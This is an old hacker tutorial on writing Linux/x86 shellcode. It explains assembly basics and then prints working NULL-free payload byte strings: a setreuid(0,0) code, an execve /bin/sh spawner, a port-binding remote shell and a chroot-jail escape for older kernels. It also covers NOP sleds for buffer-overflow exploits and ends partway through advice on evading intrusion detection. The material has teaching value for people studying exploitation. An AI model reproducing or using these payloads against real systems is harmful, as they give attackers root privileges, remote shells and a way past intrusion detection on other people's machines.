UNF && pr1 present: Writing Linux/x86 shellcodes for dum dums.
        	  
        	  
-----------------------------------------------------------------------------------------------
Copyright (c) February 2002, Sebastian Hegenbart (a.k.a pr1) and UNF (United Net Frontier)
The following material is property of UNF && pr1.
Do not redistribute this article modified and give proper credit to UNF and pr1 if you 
redistribute it or if you write your own article based upon the following material.
-----------------------------------------------------------------------------------------------

1. Introduction

There are quite a few good texts about writing shellcode out there. Unfortunately,
some of them require a lot of assembler knowledge. In this text I'll try to introduce 
you to Linux/x86 assembler as well as to writing shellcode for Linux/x86.
This introduction to ASM won't be complete, though. I will only cover the parts that
matter for writing shellcode, and try to do a good job of explaining the code used. 
Nothing can replace a good ASM book or a disassembler ;)


1.2. What is shellcode?

Shellcode is simply a bunch of CPU instructions. It's called shellcode because the first 
shellcodes simply spawned a shell. The term is actually obsolete ;) because there are 
remote shellcodes (UDP as well as TCP), chroot breaking codes, codes that
append a line to a file, setreuid codes and much more ...
I'm going to call it shellcode throughout the text because everybody does. 


1.3. What do we need shellcode for?

After taking over a process (hopefully suid|sgid|daemon run by root...) we usually want 
it to do something useful. There are lots of techniques like return into libc, overwriting
GOT addys, PLT infection, exploiting .dtors ... 
If you can't get any other function to do your mighty work ( overwriting func pointers, ... ) 
you may want to use shellcode. Simply overwrite the saved return address with some buffer 
address, so that %eip lands in a bunch of NOPs, and your CPU will fetch instructions from there on. 
If you did a good job writing the exploit, your input buffer holds the shellcode somewhere
behind those NOPs. Once %eip reaches the start of your shellcode it will be executed and you win!



1.4 How do I write shellcode?
 
 Ok let's start the main part of this article.  I assume that you have at least some C knowledge.

 
=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=
2. Assembler:
 
 Asm is a low level programming language. It's so damn low level that you're able to set some 
 transistors in your CPU. An IA-32 CPU works with several registers. Accessing those registers
 is much faster than accessing memory directly. You tell your program what to do by 
 filling those registers with values. 
 The most important registers to know are:  %eax,%ebx,%ecx,%edx,%esp,%ebp,%eip,%esi,%edi
 All general purpose registers of a 32 bit CPU are 4 bytes long.
 These names might sound like there was some uncreative developer doing his work but
 that's wrong:
 
 # %eax is the accumulator register. After switching to kernel mode (int $0x80) the kernel checks
   it for the syscall number (every function provided by our kernel has its own syscall number).
   Look for these numbers in /usr/include/asm/unistd.h.
   
 # %ebx is the base register. The first argument to a syscall should be placed inside this 
   register.
   
 # %ecx holds the second argument.
 
 # %edx holds the third.
 
 # %esp is the stack pointer and points to the top of the stack.
  
 # %ebp is the base (or frame) pointer; it points to the bottom of the current stack frame.
 
 # %eip is the instruction pointer (our best friend in relation to buffer overflows).
   Note that no instruction writes this register directly; only control transfers such as
   jmp, call and ret change it.
   
 # %esi and %edi are the source and destination index registers (use them to hold pointers
   to user data in your shellcode)
 
 
2.1 Modifying registers:
 
 There are a lot of instructions dealing with the modification of registers.
 You can modify a byte, a word or the whole register.
 The operand size is selected with a suffix appended to the instruction.
 
 e.g.: movl,movb,movw (long,byte,word)
 
 
# mov ... the mov instruction helps you to move something into a register (an addy,some number,
  another register's content...). In AT&T syntax (the syntax I'm using throughout the text) the 
  source is the first operand, the destination the second.
  
# inc,dec ... increments or decrements the content of a register

# sub,add ... adds/subtracts something to/from the content of a register

# xor ... This is a bitwise operation (like not, or, and, and their negations). 

  Xor plays a special role when dealing with shellcodes,
  so some basic explanation of the xor operation is due:

  xoring 1 with 0 is: 1, 0 with 1 is: 1, 0 with 0 is: 0, 1 with 1 is: 0
  thus 4 xor 4 is 0 (100 xor 100 == 000); xoring a register with itself always zeroes it.
  Note: xor returns the bits in which two numbers differ, so counting the 1 bits of the result
  gives the Hamming distance between two code words. This is used in coding theory and encryption.
  
  
# leal ... (stands for load effective address long) with this instruction you can load a memory 
  address into a register 
  
# int $0x80 that's a software interrupt. To keep it simple it just switches to kernel mode and
  lets the kernel execute our syscall.
  
# push,pop ... save something on the stack or load it back from the stack
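
The xor remarks above can be checked with a few lines of C. This is only a sketch; the
function names hamming_distance and xor_self are made up for this illustration and do not
come from any library.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: counts the bits in which a and b differ.
 * a ^ b has a 1 bit exactly where the operands differ, so the
 * number of 1 bits in the result is the Hamming distance. */
unsigned hamming_distance(uint32_t a, uint32_t b)
{
    uint32_t diff = a ^ b;
    unsigned count = 0;

    while (diff != 0) {
        count += diff & 1u;   /* add the lowest bit */
        diff >>= 1;           /* and move on to the next one */
    }
    return count;
}

/* xoring a value with itself clears every bit, whatever the value was.
 * That is what xorl %eax,%eax does to a register. */
uint32_t xor_self(uint32_t reg)
{
    uint32_t result = reg ^ reg;

    assert(result == 0);      /* holds for every possible input */
    return result;
}
```

hamming_distance(5, 6) compares 101 with 110 and yields 2, while xor_self returns 0 for any
input, which is why xor is the usual way to zero a register.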

  
Note: Registers can be accessed byte-wise (%al,%ah,%bl,%bh,...), word-wise (%ax,%bx,...) or as a
whole (%eax,%ebx,...). %al and %ah are the lower and the higher byte of the lower word (%ax) of
the (extended) register %eax. There is no way to access the higher word of a register directly.
  
 
Prepared with this knowledge we can start writing some asm code and later some shellcode.


Let's start with a Hello, world ;) (there was no way of avoiding it)

.data
message:
.string "Hello, world\n"

.text
.globl main
main:

# write(int fd, const void *buf, size_t count);

movl $0x4,%eax     # Syscall number 4 from /usr/include/asm/unistd.h into %eax
movl $0x1,%ebx     # The standard output file descriptor (stdout)
movl $message,%ecx # the addy of our message into %ecx
movl $0xd,%edx     # the length of our message (13 bytes including the newline)
int $0x80          # switch to kernel mode, the kernel executes write()

# exit(int returncode);

movl $0x1,%eax # Syscall number 1
xorl %ebx,%ebx  # set %ebx zero
int $0x80

Note: This piece of code wouldn't work as shellcode for two reasons:
1. It's not address independent ( due to the declaration of a .data section )
2. It contains zero bytes, which terminate the usual string functions.


Don't panic! I'll explain the whole procedure of making the shellcode now ;)


=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=

3. Writing shellcode:


3.1 Setreuid shellcode:

We will start with a small and easy piece, a setreuid(0,0) shellcode.
We need a setreuid or a seteuid shellcode if the program drops privileges before
the vulnerable function executes ( usually with a seteuid(getuid()) ).


The C program would look like:

#include <stdlib.h>
#include <unistd.h>

int main(void) {

setreuid(0,0);
exit(0);
}

 
080483b0 <main>:
 80483b0:       b8 46 00 00 00          movl    $0x46,%eax
 80483b5:       bb 00 00 00 00          movl    $0x0,%ebx
 80483ba:       b9 00 00 00 00          movl    $0x0,%ecx
 80483bf:       cd 80                   int     $0x80
 80483c1:       8d 76 00                lea     0x0(%esi),%esi
 80483c4:       90                      nop    
 80483c5:       90                      nop    
 80483c6:       90                      nop    
 80483c7:       90                      nop    
 80483c8:       90                      nop    
 80483c9:       90                      nop    
 80483ca:       90                      nop    
 80483cb:       90                      nop    
 80483cc:       90                      nop    
 80483cd:       90                      nop    
 80483ce:       90                      nop    
 80483cf:       90                      nop    


That's the whole main function generated by our compiler. But we only need the setreuid piece:
 
 
 80483b0:       b8 46 00 00 00          movl    $0x46,%eax
 80483b5:       bb 00 00 00 00          movl    $0x0,%ebx
 80483ba:       b9 00 00 00 00          movl    $0x0,%ecx
 80483bf:       cd 80                   int    $0x80
             

Thus the setreuid shellcode would be:

    "\xb8\x46\x00\x00\x00"
    "\xbb\x00\x00\x00\x00" 
    "\xb9\x00\x00\x00\x00" 
    "\xcd\x80" 
    
    
If you go through this shellcode you will notice that there are more NULL bytes ( \x00 ) 
than instructions in this code. Unfortunately we can't use any shellcode containing NULL bytes.
That's because most of the time we will be exploiting C programs, and there is no string
datatype in C. There is only a (char *) pointer pointing to the first byte in memory,
and a NULL byte marks the end of the string. 
String functions like strcpy and strcat stop copying as soon as they reach
the first NULL byte because they think they have reached the end of the string.

Thus only "\xb8\x46" from our setreuid shellcode would be copied when trying to exploit a 
program. 
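
To see the truncation for yourself, here is a minimal C sketch. The name
bytes_surviving_strcpy and the 64 byte scratch buffer are assumptions made for this
illustration only.

```c
#include <assert.h>
#include <string.h>

/* The setreuid bytes from above, NULL bytes included. */
static const char with_nulls[] =
    "\xb8\x46\x00\x00\x00"
    "\xbb\x00\x00\x00\x00"
    "\xb9\x00\x00\x00\x00"
    "\xcd\x80";

/* Hypothetical helper: copies payload the way a vulnerable program would
 * (with strcpy) and reports how many bytes actually arrived. */
size_t bytes_surviving_strcpy(const char *payload)
{
    char dst[64];

    assert(strlen(payload) < sizeof dst);  /* keep the demo itself safe */
    strcpy(dst, payload);                  /* stops at the first \x00 */
    return strlen(dst);
}
```

The array holds 17 bytes of code ( sizeof(with_nulls) - 1 ), but
bytes_surviving_strcpy(with_nulls) reports that only 2 of them get copied.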


What we have to do now is to rewrite our assembly code so that there are no NULL bytes
left in our shellcode.

As you can see, these are the instructions containing NULL bytes:

 
 80483b0:       b8 46 00 00 00          movl    $0x46,%eax
 80483b5:       bb 00 00 00 00          movl    $0x0,%ebx
 80483ba:       b9 00 00 00 00          movl    $0x0,%ecx


We have to find equivalent instructions which do not produce any NULL - bytes:

80483b0:       b8 46 00 00 00          movl    $0x46,%eax

This immediate instruction encodes into [opcode|destination][4 byte immediate value].
Because our immediate value is only 0x46 and the operand size is long, the other
three bytes are filled with zeros.

We substitute this with:

 80483c6:       31 c0                   xorl    %eax,%eax
 80483c8:       b0 46                   movb    $0x46,%al
 
The xorl sets %eax to zero. This is needed because we can't be sure that %eax is empty 
when we change only the lower 8 bits. If the upper 24 bits held some value the kernel would 
execute the wrong syscall, so we zero the register out in advance. 

The movb instruction encodes into [opcode|register][1 byte immediate value].
One byte can encode unsigned values up to 255, which is enough for the syscall numbers used here.
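
Why the xorl matters can be modelled in C by treating %eax as a 32 bit integer. This is
a rough sketch; movb_al and load_syscall_number are made-up names and only imitate what
the two instructions do to the register.

```c
#include <assert.h>
#include <stdint.h>

/* Models movb $value,%al: only bits 0-7 change,
 * bits 8-31 keep whatever they held before. */
uint32_t movb_al(uint32_t eax, uint8_t value)
{
    return (eax & 0xffffff00u) | value;
}

/* Models the pair xorl %eax,%eax / movb $number,%al. */
uint32_t load_syscall_number(uint32_t eax, uint8_t number)
{
    eax ^= eax;                   /* xorl %eax,%eax clears all 32 bits */
    eax = movb_al(eax, number);   /* movb $number,%al */
    assert(eax == number);        /* true regardless of the old content */
    return eax;
}
```

With leftover data in the register, movb_al(0x00001200, 0x46) gives 0x1246, which is not
the setreuid syscall number. load_syscall_number always ends up with exactly 0x46.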


 
Again, our logically equivalent NULL free setreuid piece:

               
 80483b0:       31 c0                   xorl    %eax,%eax
 80483b2:       31 db                   xorl    %ebx,%ebx
 80483b4:       31 c9                   xorl    %ecx,%ecx
 80483b6:       b0 46                   movb    $0x46,%al
 80483b8:       cd 80                   int    $0x80


And our working shellcode:

	"\x31\xc0"
	"\x31\xdb"
	"\x31\xc9"
	"\xb0\x46"
	"\xcd\x80"


Besides being NULL free, a good shellcode should also be as small as possible. The smaller
the shellcode, the more NOPs can be placed in the exploit buffer, thus increasing the chances
of guessing the correct return address.
 

3.2 Making your shellcode portable: 

You will probably not know much about a remote system. Or you won't have enough privileges to
find out a lot about the remote system. Or you maybe do not even have access to the remote
system yet. These are a few reasons not to write shellcode fitting only one system.  
Your shellcode should be portable. Thus no absolute addressing may be used when writing 
shellcode. Chances are minimal that the data you need will be at the expected address.
Shellcode should generally be written using relative addresses.

e.g.: we do not write: jmp 0x80483b8, instead we write a relative jump: jmp 0x1a
( 0x1a bytes forward, counted from the end of the jmp instruction )

 
3.3 Shell spawning shellcode:


Spawning a shell in C looks like:

#include <stdio.h>
#include <unistd.h>

int main(void) {
char *name[2];

name[0]="/bin/sh";
name[1]=NULL;

execve(name[0],name,NULL);
return 0;
}


As you can see, we need a character string ( "/bin/sh" ) to let execve know what we want
to execute. But we have to fetch the address of "/bin/sh" somehow, in a way that lets us 
refer to it relatively. 



If you have some knowledge about the Intel architecture and CPU architecture in general you
know that the memory location of the next instruction to be executed is stored in %eip, often
called pc or program counter. If a program calls a sub-function, the address of the next 
instruction to be executed after the sub-function's return must be stored somewhere. 

On some RISC CPUs this address is stored in a register:

jal addy,reg /* jumps to addy and stores pc+4 in reg */
jr reg       /* the return of our sub-function jumps to the addy stored in reg */


For our Intel CISC:

call sub_func /* jumps to sub_func and pushes the address of the instruction following
                 the call onto the stack */
ret           /* after the stack was cleaned up, the function jumps to the saved address
                 lying on the stack */


We can say that the address of the next instruction is pushed onto the stack by call. 

Thus we can apply a little trick:

call some_offset    /* call pushes the address of "/bin/sh" ( the byte right after the call ) onto the stack */
.string "/bin/sh"


Note that the string "/bin/sh" lies in the .text ( or code ) segment. Our CPU can't execute 
"/bin/sh", thus we have to make sure that it never actually runs into these bytes as code.

Let's look at a complete example of fetching an address and avoiding the execution of "/bin/sh".

.globl main
main:

jmp to_call
after_jmp:

popl %esi  /* addy is now in %esi */

/* exit */
xorl %eax,%eax
incl %eax
int $0x80

to_call:
call after_jmp
.string "/bin/sh" 


We jmp to the call, let call do its work ( pushing the address of the string and jumping
back ), pop the address from the stack and exit.

Put together with the execve syscall, our shell spawning shellcode looks like this:

static char lnx_execve[]=

"\xeb\x1d"                  // jmp     0x1d  /* jump forward to the call to gather "/bin/sh" addy */
"\x5b"                      // popl    %ebx  /* popping "/bin/sh" addy */
"\x31\xc0"                  // xorl    %eax,%eax   
"\x89\x5b\x08"              // movl    %ebx,0x8(%ebx) /* store the string addy at offset 0x8: name[0] */
"\x88\x43\x07"              // movb    %al,0x7(%ebx)  /* NULL terminate the string */
"\x89\x43\x0c"              // movl    %eax,0xc(%ebx) /* NULL terminate the arguments: name[1] */
"\x8d\x4b\x08"              // leal    0x8(%ebx),%ecx /* loads %ecx with the addy of name[] */
"\x8d\x53\x0c"              // leal    0xc(%ebx),%edx /* loads %edx with the addy of the NULL pointer */
"\xb0\x0b"                  // movb    $0xb,%al       /* execve syscall */
"\xcd\x80"                  // int     $0x80 		
"\x31\xc0"                  // xorl    %eax,%eax	  /* and exit to avoid an infinite loop */
"\x21\xd8"                  // andl    %ebx,%eax
"\x40"                      // incl    %eax
"\xcd\x80"                  // int     $0x80
"\xe8\xde\xff\xff\xff"      // call    -0x22 /* displacement 0xffffffde, back to the popl */
"/bin/sh";

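The jmp and call displacements in the listing above can be checked by hand. Counting the
bytes, the jmp sits at offset 0, the popl at offset 2, the call at offset 31 and the string
at offset 36. The following C sketch does the arithmetic; jmp_rel8 and call_rel32 are names
made up for this illustration.

```c
#include <assert.h>
#include <stdint.h>

/* A short jmp is 2 bytes long (opcode 0xeb + 1 displacement byte).
 * The displacement is counted from the end of the instruction. */
int8_t jmp_rel8(long jmp_offset, long target_offset)
{
    long disp = target_offset - (jmp_offset + 2);

    assert(disp >= -128 && disp <= 127);   /* must fit into one signed byte */
    return (int8_t)disp;
}

/* A near call is 5 bytes long (opcode 0xe8 + 4 displacement bytes).
 * Again the displacement is relative to the following instruction. */
int32_t call_rel32(long call_offset, long target_offset)
{
    return (int32_t)(target_offset - (call_offset + 5));
}
```

jmp_rel8(0, 31) gives 0x1d and call_rel32(31, 2) gives -0x22, which is stored little endian
as \xde\xff\xff\xff. A negative displacement has no NULL bytes because its upper bytes are
all 0xff; that is the reason the call jumps backwards and the jmp forwards.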

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

4.0 More Advanced Shellcodes:


Considering remote exploits we need other kinds of shellcodes. We can't just spawn a shell 
remotely. Thus our shellcode needs network capabilities. To bind a shell onto a port 
we can write:


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>


int main(void) {
	int fd,fd2;
	struct sockaddr_in addy;

	memset(&addy,0,sizeof(addy));
	addy.sin_addr.s_addr = INADDR_ANY;
	addy.sin_port = htons(1337);
	addy.sin_family = AF_INET;

	fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

	bind(fd,(struct sockaddr *)&addy,sizeof(struct sockaddr_in));
	listen(fd,1);

	fd2 = accept(fd,NULL,NULL);

	/* connect stdin, stdout and stderr to the socket */
	dup2(fd2,0);
	dup2(fd2,1);
	dup2(fd2,2);

	execl("/bin/sh","sh",(char *)NULL);
	return 1;
}



A quite easy task in C. Now let's try the same thing in assembler.


4.1. Socket Syscalls:

Usually the syscall number is moved into %eax and the arguments into the following registers.
After triggering the kernel interrupt our work is done. 
Some functions have more arguments than there are registers to store them in. In this case
simply store your arguments in user memory and save the address of this memory in a register. 

For socket syscalls ( socket, bind, listen, accept,... ) it's slightly different.
Every socket call has the syscall number 0x66 ( socketcall ). So how does the kernel know which
call was meant? This is done via a subcode in %ebx; %ecx holds the address of the argument block.


Some important subcodes are:

socket()   1
bind()     2
listen()   4
accept()   5

Check <linux/net.h> for more. 
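
What ends up in the registers for one such call can be written down in C. This is only a
sketch of the layout, it does not invoke the kernel. The struct socketcall_regs, the SC_
constants and prepare_socket_call are made up for this illustration ( <linux/net.h> names
the subcodes SYS_SOCKET, SYS_BIND and so on ).

```c
#include <assert.h>
#include <sys/socket.h>

/* Subcodes as listed above; the SC_ names are hypothetical. */
enum socket_subcode { SC_SOCKET = 1, SC_BIND = 2, SC_LISTEN = 4, SC_ACCEPT = 5 };

/* What the three registers would hold for one socketcall. */
struct socketcall_regs {
    unsigned long eax;    /* always 0x66 */
    unsigned long ebx;    /* subcode selecting the socket function */
    unsigned long *ecx;   /* address of the argument block in user memory */
};

/* Fills the argument block for socket(AF_INET, SOCK_STREAM, 0). */
struct socketcall_regs prepare_socket_call(unsigned long args[3])
{
    struct socketcall_regs regs;

    assert(args != 0);
    args[0] = AF_INET;       /* 1st argument: domain */
    args[1] = SOCK_STREAM;   /* 2nd argument: type */
    args[2] = 0;             /* 3rd argument: protocol */

    regs.eax = 0x66;
    regs.ebx = SC_SOCKET;
    regs.ecx = args;
    return regs;
}
```

The arguments lie next to each other in memory, and only the address of the first one is
handed to the kernel.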


4.2. Struct Sockaddr_in:

We also have to take a look at struct sockaddr_in. On Linux it is laid out like this
( BSD systems put an additional 1 byte sin_len field in front and shrink sin_family to 1 byte ):


struct sockaddr_in {
  
  sa_family_t sin_family; /* 2 byte containing AF_INET (defined as 2) */
 
  in_port_t sin_port;     /* 2 byte with the TCP or UDP port number in network byte order */ 
 
  struct in_addr sin_addr; /* 4 byte, usually contains the server's addy but we want to bind
                            * our own addy and thus zero it out (same as INADDR_ANY) */
  char sin_zero[8];       /* should be zeroed out as well */
};

The whole structure is 0x10 bytes long; this length is handed to bind() as its third argument.
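
Network byte order means that the high byte of the port comes first in memory, whatever the
host CPU does. A small C sketch shows the two bytes of sin_port; port_to_bytes and
bytes_to_port are names invented for this example.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>

/* Writes the two bytes of sin_port for `port` as they lie in memory. */
void port_to_bytes(uint16_t port, unsigned char out[2])
{
    uint16_t net = htons(port);    /* host order -> network order */

    assert(out != NULL);
    memcpy(out, &net, sizeof net);
}

/* Reads two bytes found in memory back as a port number. */
uint16_t bytes_to_port(const unsigned char in[2])
{
    return (uint16_t)((in[0] << 8) | in[1]);
}
```

For port 1337 ( 0x0539 ) the bytes in memory are 0x05 0x39. When shellcode stores a 16 bit
register directly, the x86 writes the low byte first, so the resulting port is the byte
swapped value of what was in the register.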



4.3. Port binding shellcode:


static char bind[]=

/* socket(int domain, int type, int protocol); */

"\x31\xc0"                    //   xorl    %eax,%eax
"\x89\x46\x10"                //   movl    %eax, 0x10(%esi)   /* 3rd Argument IPPROTO_TCP */
"\x40"                        //   incl    %eax
"\x89\xc3"                    //   movl    %eax, %ebx
"\x89\x46\x0c"                //   movl    %eax, 0xc(%esi)    /* 2nd Argument SOCK_STREAM */
"\x40"                        //   incl    %eax
"\x89\x46\x08"                //   movl    %eax, 0x8(%esi)    /* 1st Argument AF_INET */
"\x8d\x4e\x08"                //   leal    0x8(%esi), %ecx
"\xb0\x66"                    //   movb    $0x66, %al
"\xcd\x80"                    //   int     $0x80

/* bind(int fd, struct sockaddr_in *my_addy, socklen_t addrlen); */

"\x43"                        //   incl    %ebx               /* subcode 2: bind */
"\x88\x46\x04"                //   movb    %al,0x4(%esi)      /* save fd returned from socket */
"\x31\xc0"                    //   xorl    %eax,%eax
"\xc6\x46\x0c\x10"            //   movb    $0x10,0xc(%esi)    /* sockaddr_in length */
"\x66\x89\x5e\x10"            //   movw    %bx,0x10(%esi)     /* AF_INET */
"\x89\x46\x14"                //   movl    %eax,0x14(%esi)    /* INADDR_ANY */
"\x89\xc2"                    //   movl    %eax,%edx         
"\xb0\x90"                    //   movb    $0x90,%al          /* sin_port */
"\x66\x89\x46\x12"            //   movw    %ax,0x12(%esi)     /* bytes 0x90 0x00: port 36864 */
"\x8d\x4e\x10"                //   leal    0x10(%esi),%ecx    /* load structure addy into %ecx */
"\x89\x4e\x08"                //   movl    %ecx,0x8(%esi)     /* save struct addy at offset 0x8 */
"\x8d\x4e\x04"                //   leal    0x4(%esi),%ecx     /* arguments ( fd, struct addy, length ) into %ecx */
"\xb0\x66"                    //   movb    $0x66,%al
"\xcd\x80"                    //   int     $0x80

/* listen(int fd, int backlog); */

"\x89\x5e\x08"                //   movl    %ebx,0x8(%esi) 
"\x43"                        //   incl    %ebx
"\x43"                        //   incl    %ebx 
"\xb0\x66"                    //   movb    $0x66,%al
"\xcd\x80"                    //   int     $0x80

/* accept(int fd, struct sockaddr_in *addy, socklen_t *addrlen); */

"\x89\x56\x08"                //   movl    %edx,0x8(%esi)     /* addy is a NULL pointer */
"\x89\x56\x0c"                //   movl    %edx,0xc(%esi)     /* so is addrlen */
"\x43"                        //   incl    %ebx
"\xb0\x66"                    //   movb    $0x66,%al
"\xcd\x80"                    //   int     $0x80

/* dup2(int old, int new) */

"\x86\xc3"                    //   xchg    %al,%bl            /* fd returned from accept is first arg */
"\x31\xc9"                    //   xorl    %ecx,%ecx          /* stdin */
"\xb0\x3f"                    //   movb    $0x3f,%al     
"\xcd\x80"                    //   int     $0x80

"\x41"                        //   incl    %ecx               /* stdout */
"\xb0\x3f"                    //   movb    $0x3f,%al
"\xcd\x80"                    //   int     $0x80

"\x41"                        //   incl    %ecx               /* stderr */
"\xb0\x3f"                    //   movb    $0x3f,%al
"\xcd\x80"                    //   int     $0x80

   
/* execve(const char *filename, char *const argv[], char *const envp[]); */

"\xeb\x1d"                    //   jmp     0x1d  /* jump forward to the call to gather "/bin/sh" addy */
"\x5b"                        //   popl    %ebx  /* popping "/bin/sh" addy */
"\x31\xc0"                    //   xorl    %eax,%eax
"\x89\x5b\x08"                //   movl    %ebx,0x8(%ebx) /* store the string addy at offset 0x8 */
"\x88\x43\x07"                //   movb    %al,0x7(%ebx)  /* NULL terminate the string */
"\x89\x43\x0c"                //   movl    %eax,0xc(%ebx) /* NULL terminate the arguments */
"\x8d\x4b\x08"                //   leal    0x8(%ebx),%ecx /* loads %ecx with the addy of the argument array */
"\x8d\x53\x0c"                //   leal    0xc(%ebx),%edx /* loads %edx with the addy of the NULL pointer */
"\xb0\x0b"                    //   movb    $0xb,%al       /* execve syscall */
"\xcd\x80"                    //   int     $0x80
"\x31\xc0"                    //   xorl    %eax,%eax
"\x21\xd8"                    //   andl    %ebx,%eax
"\x40"                        //   incl    %eax 
"\xcd\x80"                    //   int     $0x80
"\xe8\xde\xff\xff\xff"        //   call    -0x22 /* displacement 0xffffffde, back to the popl */
"/bin/sh";



Note: This shellcode is quite bloated. It could be optimized further, especially the execve part
( that's our original execve code ). I didn't optimize it further for better readability. Its 
only purpose is to show the principles of writing portbind shellcode.


=-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-=
5. Chroot breaking shellcode:

Note: On Linux the chroot behaviour changed somewhere between kernel 2.4.6 and 2.4.13.
This method works only on kernels <= 2.4.5.

Sometimes daemons like ftpd,httpd,... run in a so called change-root jail.
This simply means that the root directory of the process is changed to some other path,
e.g. /home/pr1. Since your / is now this directory (note that this is not the real root)
you can't perform a cd .. to get out of it and do mighty things with your account.
You are not able to spawn a shell either, because
/home/pr1/bin/sh does not really exist ( if we consider /home/pr1 to be chrooted ).
Unfortunately for computer security you can break this jail.

This is a quite easy task:

* create another directory
* chroot this directory
* do a chroot("../../../"); with many "../"


Our chroot breaking C proggy:

#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void) {
	mkdir("pr1",0755);
	chroot("pr1");
	chroot("../../../../../../../../../../");
	return 0;
}


Note: We create a directory called "sh" in assembler. We can use the string we need to execute
the shell as our directory name. That way we can reduce our shellcode's size and simplify 
the code. ;)


static char chroot[]=
"\xeb\x4e"                       // jmp     0x4e

/* mkdir(); */
"\x31\xc0"                       //  xorl    %eax,%eax 
"\x5e"                           //  popl    %esi            /* addy of /bin/sh now in %esi */
"\x8d\x5e\x05"                   //  leal    0x5(%esi),%ebx  /* load addy of sh into %ebx */
"\x66\xb9\xed\x01"               //  movw    $0x1ed,%cx      /* that's the 0755 mode flag */
"\xb0\x27"                       //  movb    $0x27,%al       /* mkdir syscall */
"\xcd\x80"                       //  int     $0x80

/* chroot(); */
"\x31\xc0"                       //  xorl    %eax,%eax 
"\xb0\x3d"                       //  movb    $0x3d,%al    /* chroot syscall, sh still in %ebx */
"\xcd\x80"                       //  int     $0x80

/* chroot("../"); */
"\x31\xc0"                       //  xorl    %eax,%eax
"\xbb\xd2\xd1\xd0\xff"           //  movl    $0xffd0d1d2,%ebx 
"\xf7\xdb"                       //  negl    %ebx

/* We put "../" into %ebx.
*  "../" encodes into "\x2e\x2e\x2f". Intel is little endian, so the register has to hold
*  0x002f2e2e, which contains a NULL byte. Thus we put its negative, 0xffd0d1d2, into %ebx
*  and perform a negl on this value. This results in our wished 0x002f2e2e, i.e. "../"
*  plus a terminating NULL.
*/


"\x31\xc9"                       //  xorl    %ecx,%ecx
"\xb1\x10"                       //  movb    $0x10,%cl    /* we loop for 16 times */
"\x56"                           //  pushl   %esi         /* save "/bin/sh" string */

/* Set the index register. We start at 0x10(%esi) */

"\x01\xce"                       //  addl    %ecx,%esi 

"\x89\x1e"                       //  movl    %ebx,(%esi) /* and write to pointed addy */
"\x83\xc6\x03"                   //  addl    $0x3,%esi   /* advance the index register by one "../" */
"\xe0\xf9"                       //  loopne  -0x7      
"\x5e"                           //  popl    %esi        /* restore "/bin/sh" string */
"\xb0\x3d"                       //  movb    $0x3d,%al   /* chroot syscall */
"\x8d\x5e\x10"                   //  leal    0x10(%esi),%ebx /* this is our evil ../../.. string */
"\xcd\x80"                       //  int     $0x80

/* execve */
"\x31\xc0"                       //  xorl    %eax,%eax
"\x89\x76\x08"                   //  movl    %esi,0x8(%esi)
"\x89\x46\x0c"                   //  movl    %eax,0xc(%esi)
"\xb0\x0b"                       //  movb    $0xb,%al
"\x89\xf3"                       //  movl    %esi,%ebx
"\x8d\x4e\x08"                   //  leal    0x8(%esi),%ecx
"\x8d\x56\x0c"                   //  leal    0xc(%esi),%edx
"\xcd\x80"                       //  int     $0x80

/* exit */
"\x31\xc0"                       // xorl    %eax,%eax 
"\x21\xd8"                       // andl    %ebx,%eax
"\x40"                           // incl    %eax 
"\xcd\x80"                       // int     $0x80
"\xe8\xad\xff\xff\xff"           // call    -0x53 /* displacement 0xffffffad, back to the first xorl */
"/bin/sh";


Note: This negation trick is from TaeHo's chroot shellcode. 
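
The arithmetic behind loading "../" without NULL bytes, and the way the store loop builds
the long path, can be followed in C. This is a sketch under my own naming; pack_le, neg32,
null_free and repeat_word are invented for this illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Packs up to 4 bytes the way a little endian movl would see them. */
uint32_t pack_le(const char *s, size_t len)
{
    uint32_t value = 0;
    size_t i;

    assert(len <= 4);
    for (i = 0; i < len; i++)
        value |= (uint32_t)(unsigned char)s[i] << (8 * i);
    return value;
}

/* Two's complement negation, which is what negl performs. */
uint32_t neg32(uint32_t x)
{
    return 0u - x;
}

/* Returns 1 if none of the 4 bytes of x is zero, 0 otherwise. */
int null_free(uint32_t x)
{
    return (x & 0xffu) && (x & 0xff00u) && (x & 0xff0000u) && (x & 0xff000000u);
}

/* Mimics the store loop: a 4 byte write every 3 bytes, count times.
 * buf needs room for 3 * count + 1 bytes. */
void repeat_word(char *buf, uint32_t word, int count)
{
    unsigned char bytes[4];
    int i;

    for (i = 0; i < 4; i++)
        bytes[i] = (unsigned char)(word >> (8 * i));
    for (i = 0; i < count; i++)
        memcpy(buf + 3 * i, bytes, 4);
}
```

pack_le("../", 3) is 0x002f2e2e and contains a NULL byte; its negation 0xffd0d1d2 does not,
and negating again restores the original. Each 4 byte store overwrites the NULL of the
previous one, so 16 rounds leave a 48 character "../../.." string with a single
terminator at the end.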


=-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-=
6. IDS-evasive Codes:

Simple Intrusion Detection Systems try to identify an exploit attempt by counting the number of
NOP or NOP-like instructions in received packets. ( If you do not know what a NOP is: it's 
an instruction that does nothing at all. It is used in exploits to maximize the chances of 
guessing a correct buffer address. If you hit a NOP, execution will proceed until it reaches
your mighty shellcode. ) 
These techniques can be fooled, however:


One of the first ideas to fool this was to use a 1 byte jump:
\x90 ( nop ) is substituted with "\xeb\x01" ( jmp 0x1 )


Another way is to use other nop-like instructions like 
incl %eax,incl %ebx,incl %ecx,incl %edx: 

